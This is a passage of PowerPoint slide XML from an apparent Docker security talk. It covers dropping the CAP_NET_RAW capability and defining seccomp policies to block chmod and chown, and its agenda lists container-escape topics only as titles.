              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Seccomp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>misconfigurations in Docker </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping container running with --privileged flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unauthenticated Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="568325" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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2936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t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Security: Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1423555"/>
            <a:ext cx="9905999" cy="4367646"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0"/>
              <a:t>Before Dropping capabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAP_NET_RAW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run -d -it ab0d83586b6e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exec -it &lt;container-id&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2634720"/>
            <a:ext cx="9789218" cy="3439314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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76923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t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Security: Capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1423555"/>
            <a:ext cx="9905999" cy="4367646"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0"/>
              <a:t>Drop capabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAP_NET_RAW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run --cap-drop NET_RAW -d -it ab0d83586b6e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="231775" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exec -it &lt;container-id&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="346629" y="2606868"/>
            <a:ext cx="11495564" cy="3385009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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015536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pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516253" y="1971040"/>
            <a:ext cx="11556004" cy="3974586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>SecComp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>is more or less like ACLs for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>syscalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Policies defined in a JSON file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748422" y="203200"/>
            <a:ext cx="10515600" cy="131064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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security: Seccomp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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16475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t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Security: Seccomp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1423554"/>
            <a:ext cx="4609147" cy="485532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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0"/>
              <a:t>In this initial step we've defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>seccomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> permissions to disable allowing containers to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and chown32.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> formatted file for defining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>seccomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6766560" y="1329012"/>
            <a:ext cx="4028192" cy="4949868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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91580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t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Security: Seccomp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1423554"/>
            <a:ext cx="9648507" cy="485532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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0"/>
              <a:t>Running a container with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>seccomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2375092" y="2369596"/>
            <a:ext cx="7679937" cy="3055844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
